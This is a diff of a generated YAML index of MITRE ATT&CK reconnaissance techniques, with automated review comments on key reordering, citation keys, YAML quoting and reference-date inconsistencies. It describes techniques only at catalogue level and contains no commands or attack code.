- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.1'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1596.003:
technique:
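Review bot: the only content changes in this hunk are the new User-Agent paragraph in the T1592 description (`Adversaries may also gather victim host information via User-Agent HTTP headers...`), its `TrellixQakbot` reference, the `Sam Seabrook, Duke Energy` contributor and the 1.1 -> 1.2 version bump; everything else is the same object re-emitted with `name`/`description` moved above `kill_chain_phases`, `id` moved below `type`, and `url`/`external_id` swapped inside each reference. The reorder turns a five-line change into a sixty-line hunk, as it did for T1587 above. If the dumper can be given a fixed key order (or the objects sorted before dumping), future refreshes of this file stay reviewable; if not, please list the substantive changes per technique in the PR description.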
@@ -54991,7 +55668,7 @@ reconnaissance:
url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
from Server (Site URL). Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:48:37.628Z'
name: Digital Certificates
description: |-
Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
@@ -55007,8 +55684,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.002:
technique:
@@ -55030,7 +55705,7 @@ reconnaissance:
url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:44:43.900Z'
name: Purchase Technical Data
description: |-
Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -55046,8 +55721,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.005:
technique:
@@ -55075,7 +55748,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:05.302Z'
name: IP Addresses
description: |-
Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -55091,33 +55764,33 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.002:
technique:
- modified: '2022-10-21T14:32:48.393Z'
+ modified: '2024-11-11T16:13:02.196Z'
name: DNS
description: |-
- Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+ Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
created: '2020-10-02T15:47:10.102Z'
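Review bot: the new AXFR paragraph (`Adversaries may also use DNS zone transfer (DNS query type AXFR)...`) introduces three citation keys, `Trails-DNS`, `DNS-CISA` and `Alexa-dns`, that are only satisfied by the `source_name` entries added in the following hunk, so this hunk cannot be applied on its own. The 1.1 -> 1.2 version bump matches the description change. One nit on wording that is upstream's rather than this repo's: `DNS MX, TXT, and SPF records` still lists SPF as a record type although RFC 7208 retired the SPF RR in favour of TXT; leave it as a faithful mirror here, but it is fair game for an upstream issue.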
@@ -55131,18 +55804,29 @@ reconnaissance:
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
url: https://www.circl.lu/services/passive-dns/
+ - source_name: DNS-CISA
+ description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+ Leak Domain Information. Retrieved June 5, 2024.
+ url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
- source_name: DNS Dumpster
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
url: https://dnsdumpster.com/
+ - source_name: Alexa-dns
+ description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+ June 5, 2024.
+ url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
- source_name: Sean Metcalf Twitter DNS Records
description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
- May 27, 2022.
- url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+ September 12, 2024.
+ url: https://x.com/PyroTek3/status/1126487227712921600
+ - source_name: Trails-DNS
+ description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+ the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+ url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.002:
technique:
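Review bot: the `DNS-CISA` reference is internally inconsistent: its description reads `CISA. (2016, September 29)` while the URL path is `/alerts/2015/04/13/`, so the citation date and the alert's publication date are eighteen months apart. If this is a verbatim mirror of the upstream ATT&CK object, do not hand-edit it here (the next refresh would overwrite it) but raise it upstream. The Sean Metcalf reference moving from `twitter.com/.../photo/1` to `x.com/...` with a new retrieval date is fine.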
@@ -55163,7 +55847,7 @@ reconnaissance:
- source_name: WHOIS
url: https://www.whois.net/
description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:50:44.113Z'
name: WHOIS
description: |-
Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -55179,39 +55863,37 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1594:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
- type: attack-pattern
- created: '2020-10-02T16:51:50.306Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1594
- url: https://attack.mitre.org/techniques/T1594
- - source_name: Comparitech Leak
- url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
- description: Bischoff, P. (2020, October 15). Broadvoice database of more
- than 350 million customer records exposed online. Retrieved October 20,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-02T18:52:21.278Z'
name: Search Victim-Owned Websites
- description: |-
- Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
- Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+ description: "Adversaries may search websites owned by the victim for information
+ that can be used during targeting. Victim-owned websites may contain a variety
+ of details, including names of departments/divisions, physical locations,
+ and data about key employees such as names, roles, and contact info (ex: [Email
+ Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+ also have details highlighting business operations and relationships.(Citation:
+ Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+ actionable information. Information from these sources may reveal opportunities
+ for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+ or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+ establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+ or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+ initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+ or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+ to manually browsing the website, adversaries may attempt to identify hidden
+ directories or files that could contain additional sensitive information or
+ vulnerable functionality. They may do this through automated activities such
+ as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+ well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+ Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - James P Callahan, Professional Paranoid
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for suspicious network traffic that could be indicative
of adversary reconnaissance, such as rapid successions of requests indicative
of web crawling and/or large quantities of requests originating from a single
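Review bot: the T1594 `description` switches from a `|-` block scalar to a double-quoted scalar with `\n\n` escapes and a trailing space before the closing quote (`Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "`). The text is otherwise the old description plus the new hidden-directories/sitemap.xml/robots.txt paragraph, so the style change is not deliberate: libyaml-based emitters (PyYAML, Psych) refuse block style for a string with trailing whitespace and fall back to a quoted scalar, and that trailing space in the upstream text is what forces it. Strip trailing whitespace from descriptions before dumping; every technique in the file then keeps the same `|-` layout and the diff shows only the real paragraph addition.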
@@ -55219,13 +55901,41 @@ reconnaissance:
Analyzing web metadata may also reveal artifacts that can be attributed to
potentially malicious activity, such as referer or user-agent string HTTP/S
fields.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+ created: '2020-10-02T16:51:50.306Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1594
+ external_id: T1594
+ - source_name: Perez Sitemap XML 2023
+ description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+ to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+ 2024.
+ url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+ - source_name: Comparitech Leak
+ description: Bischoff, P. (2020, October 15). Broadvoice database of more
+ than 350 million customer records exposed online. Retrieved October 20,
+ 2020.
+ url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+ - source_name: Register Robots TXT 2015
+ description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+ you don't want them to look. Retrieved July 18, 2024.
+ url: https://www.theregister.com/2015/05/19/robotstxt/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.001:
technique:
@@ -55250,7 +55960,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:13.409Z'
name: DNS/Passive DNS
description: |-
Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -55266,8 +55976,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.003:
technique:
@@ -55289,7 +55997,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:38:31.983Z'
name: Identify Business Tempo
description: |-
Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -55305,8 +56013,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.001:
technique:
@@ -55332,7 +56038,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:32:10.810Z'
name: 'Gather Victim Host Information: Hardware'
description: |-
Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -55350,13 +56056,11 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1592.001
atomic_tests: []
T1598.003:
technique:
- modified: '2024-04-19T13:26:16.082Z'
+ modified: '2024-05-31T04:18:44.567Z'
name: Spearphishing Link
description: |-
Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -55412,7 +56116,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: TrendMictro Phishing
description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
October 20, 2020.
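Review bot: The ACSC reference now points at a 2021-07-08 Wayback snapshot but keeps `Retrieved October 19, 2020`, whereas the OPM Leak reference elsewhere in this diff (T1589 and T1589.003) updates the retrieval date together with the archive URL. This is upstream ATT&CK data rather than something to hand-edit in a generated index, but it is worth reporting upstream for consistency. The `TrendMictro Phishing` source_name on the following context line is a pre-existing misspelling that has to stay verbatim, because `(Citation: ...)` markers in descriptions key on it.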
@@ -55463,7 +56167,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.004:
technique:
@@ -55484,7 +56187,7 @@ reconnaissance:
- source_name: DNS Dumpster
url: https://dnsdumpster.com/
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:33:02.476Z'
name: Network Topology
description: |-
Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -55500,8 +56203,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.003:
technique:
@@ -55523,7 +56224,7 @@ reconnaissance:
url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
description: García, C. (2019, April 3). Pentesting Active Directory Forests.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:22.917Z'
name: Network Trust Dependencies
description: |-
Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -55539,8 +56240,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.001:
technique:
@@ -55562,7 +56261,7 @@ reconnaissance:
url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
Intelligence Feeds. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:45:30.862Z'
name: Threat Intel Vendors
description: |-
Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -55578,12 +56277,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589:
technique:
- modified: '2024-04-19T04:27:00.005Z'
+ modified: '2024-09-16T16:09:45.794Z'
name: Gather Victim Identity Information
description: |-
Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -55623,8 +56320,8 @@ reconnaissance:
external_id: T1589
- source_name: OPM Leak
description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- source_name: Detectify Slack Tokens
description: Detectify. (2016, April 28). Slack bot token leakage exposing
business critical information. Retrieved October 19, 2020.
@@ -55669,11 +56366,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:37:31.317Z'
name: Vulnerability Scanning
description: |-
Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -55713,9 +56409,8 @@ reconnaissance:
url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596:
technique:
@@ -55777,7 +56472,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595:
technique:
@@ -55803,7 +56497,7 @@ reconnaissance:
url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
October 20, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T20:58:13.661Z'
name: Active Scanning
description: |-
Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -55824,8 +56518,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.002:
technique:
@@ -55890,7 +56582,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1598.004:
technique:
@@ -55938,7 +56629,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.006:
technique:
@@ -55960,7 +56650,7 @@ reconnaissance:
url: https://nmap.org/book/firewalls.html
description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
and Intrusion Detection Systems. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:54.275Z'
name: Network Security Appliances
description: |-
Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -55976,34 +56666,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
- type: attack-pattern
- created: '2020-10-02T16:50:12.809Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1593.002
- url: https://attack.mitre.org/techniques/T1593/002
- - source_name: SecurityTrails Google Hacking
- url: https://securitytrails.com/blog/google-hacking-techniques
- description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- - source_name: ExploitDB GoogleHacking
- url: https://www.exploit-db.com/google-hacking-database
- description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
- October 23, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T19:19:47.758Z'
name: Search Engines
description: |-
Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
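Review bot: This hunk reads as a deletion of the entire T1593.002 STIX header (platforms, domains, id, created, external_references) but every one of those keys is re-added in a different order in the hunk that follows, so the change is a reorder plus a handful of field updates, not a removal. Review the two hunks as one unit; the substantive changes are the `modified` date, the new `revoked` and `x_mitre_deprecated` flags, `x_mitre_attack_spec_version` 2.1.0 to 3.2.0, and the SecurityTrails reference URL. A stable key order in the generator (for example, sort keys, or preserve the order of the source bundle) would make future regenerations reviewable line by line instead of block by block.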
@@ -56012,15 +56678,38 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+ created: '2020-10-02T16:50:12.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1593/002
+ external_id: T1593.002
